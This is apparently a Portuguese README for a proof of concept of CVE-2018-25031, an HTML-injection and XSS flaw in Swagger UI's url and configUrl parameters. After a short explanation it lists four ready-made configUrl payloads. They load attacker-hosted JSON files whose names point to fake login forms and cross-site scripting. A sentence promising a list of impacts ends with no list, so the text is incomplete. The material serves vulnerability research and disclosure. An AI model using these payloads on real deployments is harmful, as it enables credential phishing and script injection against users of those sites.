
Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].
Swagger UI é uma biblioteca amplamente utilizada que renderiza especificações OpenAPI (anteriormente Swagger) em uma interface web interativa. Ela permite que desenvolvedores e integradores explorem e testem APIs sem que a implementação do backend esteja em funcionamento.
A vulnerabilidade decorre da validação insuficiente dos parâmetros de consulta URL usados para carregar arquivos de configuração ou especificação remotos pelo cliente Swagger UI. Os parâmetros comuns envolvidos são:
?url=.yaml?configUrl=.jsonUm atacante pode apontar esses parâmetros para uma definição OpenAPI ou arquivo de configuração controlado pelo atacante e hospedado remotamente, que pode ser renderizado por uma instância vulnerável.
Carregar um arquivo remoto malicioso pode possibilitar vários resultados de alto impacto, dependendo da configuração de hospedagem e das proteções existentes:
Referências:
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json
?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json
O conteúdo deste repositório é fornecido apenas para fins educacionais e informativos. O autor não é responsável por qualquer uso indevido. Certifique-se de ter a devida autorização antes de usar, aja com responsabilidade por sua própria conta e risco, e siga todas as diretrizes legais e éticas.